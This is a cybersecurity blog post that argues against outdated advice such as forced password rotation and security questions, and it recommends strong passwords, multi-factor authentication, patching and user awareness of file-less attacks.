As technology advances and cyber threats evolve, it becomes imperative that we take the time to revisit long-standing principles, ensuring they are still relevant in today’s world. Traditional axioms that once served as the cornerstone of digital security guidance can often fail in the face of a rapidly changing threat landscape, maxims such as “be cautious of email spelling errors” (when it comes to phishing) and “frequently change your passwords” have, with time, shifted from being reliable safeguards to potential liabilities.
In this blog we look at some well-meaning, but now potentially harmful, cybersecurity wisdom that needs to be reconsidered and look at some approaches that need to replace them.
The ghosts of misguided cybersecurity advice past
Regular password changes
The practice of continually changing passwords was once held in high regard as a fundamental safeguard. However, as the digital landscape has matured and our understanding of security has evolved, it has become increasingly evident that this conventional wisdom may not be as effective as previously believed.
The premise behind frequent password changes was to thwart potential attackers by making it harder for them to crack or guess passwords. Unfortunately, in practice, this approach often led to unintended outcomes. Users, burdened with the need to memorise and constantly update their passwords, often resorted to simplistic, easily guessable combinations or minor alterations of their previous passwords. This weakened the overall security posture of their accounts, rendering them more susceptible to breaches.
Considering these shortcomings, a change in thinking in strategy has emerged. Rather than focusing on the frequency of password changes, we would advocate for the creation and utilisation of robust, complex passwords that are difficult for attackers to decipher. These passwords, bolstered by a combination of letters, numbers, symbols, and a healthy dose of randomness, provide a far more formidable barrier to unauthorised access.
The key to enhancing security in this new paradigm is not in routinely changing passwords, but in vigilance and prompt action when a potential breach is suspected. Regularly monitoring account activity and promptly responding to any suspicious incidents, such as unauthorised login attempts or unusual behaviour, is crucial. When such signs arise, it is wise to change the password immediately, along with implementing additional security measures such as multi-factor authentication (MFA) to fortify account defences.
The use of security questions has been a widespread practice to provide an additional layer of protection for user accounts. These innocuous questions, such as “Your first pet’s name” or “Your mother’s maiden name,” were once considered a reliable way to verify one’s identity when recovering a forgotten password or dealing with account-related issues. However, in today’s information-rich world, the effectiveness of security questions has been significantly undermined.
The fundamental flaw in the traditional approach to security questions lies in their reliance on personal information that is no longer truly confidential. In the age of social media, people openly share details about their lives, including their pets’ names, family relationships, and other personal anecdotes. As a result, what were once considered closely guarded secrets have become easily accessible to anyone with internet access, including potential hackers.
This shift in the accessibility of personal information has transformed security questions from a somewhat reliable safeguard into low-hanging fruit for cybercriminals. Armed with readily available details from social media profiles and public records, malicious actors can often bypass security questions with alarming ease, gaining unauthorised access to user accounts. What was intended to be a security feature has, in some cases, inadvertently become a backdoor for intrusion.
Recognising these vulnerabilities, it is imperative for service providers to rethink their approach to security questions. One solution is to choose security questions with answers that are not easily guessable or publicly available. Instead of relying on frequent questions like “first pet’s name” or “mother’s maiden name,” users can opt for questions that have personal significance but are less likely to be exposed online. Additionally, considering the use of multi-factor authentication (MFA) or other more robust authentication methods can further bolster account security.
One long-standing piece of advice that we have all heard is to exercise caution when dealing with unsolicited email attachments. Indeed, this wisdom remains pertinent, as email continues to be a primary vector for malware and phishing attacks. However, as technology advances and cyber threats evolve, it has become increasingly evident that the focus on email attachments alone is no longer enough to safeguard our digital domains.
Traditionally, the warning against opening unsolicited attachments aimed to protect users from downloading malicious files or inadvertently executing harmful scripts contained within these attachments. This advice has undeniably been a lifesaver, preventing countless individuals and organisations from falling victim to email-based attacks.
Yet, as we delve deeper into the ever-shifting terrain of cybersecurity, a growing trend known as “file-less attacks” is gaining prominence. These attacks, unlike their traditional counterparts, do not rely on users downloading or opening malicious attachments. Instead, they exploit vulnerabilities within the user’s system, leveraging trusted processes and applications already present on the device. This means that users can fall prey to these attacks without taking any overt actions, such as downloading files.
This shift in attack methodology has profound implications for our understanding of email security. While remaining cautious about email attachments is still vital, it is no longer sufficient to provide comprehensive protection. Cybercriminals have become adept at exploiting software vulnerabilities and weaknesses within operating systems, often without leaving a trace that an attachment would.
Therefore, a more comprehensive approach to email security is essential. This entails not only scrutinising email attachments but also regularly updating and patching software and systems to address potential vulnerabilities. Employing robust antivirus and anti-malware solutions is equally critical, as they can help detect and mitigate file-less attacks by identifying malicious activities within the system.
Furthermore, user education plays a pivotal role in enhancing email security. Individuals and organisations must be made aware of the evolving tactics employed by cybercriminals, emphasising the importance of maintaining a heightened level of vigilance when it comes to all aspects of email communication, including attachments and embedded links.
Forward-thinking approaches for a new era
Traditional notions of trust and security are being redefined, and it is imperative that we adapt our practices to address the evolving threat landscape. Three key principles warrant closer examination:
MFA: Strengthening Authentication through Diverse Channels
Multi-factor authentication (MFA) has emerged as a robust defence against cyber threats. However, it is not enough to merely implement MFA; we must also consider how we guide users through the verification process. Rather than embedding links in emails or messages, a practice that can expose users to phishing attacks, it is advisable to direct users to search for specific pages on the official website.
Additionally, for account verifications, employing one-time codes sent via email or SMS can be a more secure alternative to verification links. This approach mitigates the risk of redirect attacks, where attackers manipulate links to lead users to fraudulent sites. By embracing MFA and using secure communication channels, we strengthen the overall authentication process and reduce the likelihood of successful cyberattacks.
Don’t Underestimate your Adversary
It is crucial to dispel the notion that cybercriminals are simplistic adversaries. Many malicious actors are part of highly sophisticated and well-funded operations that continually evolve to exploit vulnerabilities. Our security policies must reflect this reality.
To effectively counter these advanced threats, organisations and individuals alike should adopt a proactive and adaptive security posture. This includes continuous monitoring, threat intelligence gathering, and investing in advanced security technologies. It is essential to stay one step ahead of cybercriminals, recognising that they are constantly innovating.
Well-intentioned but outdated advice can lead us into a false sense of security. From the debunked practice of frequent password changes to the ineffective advice of checking for spelling errors in emails, it is crucial to revise our cybersecurity strategies.
As cyber threats grow in complexity, so must our awareness and methods of defence.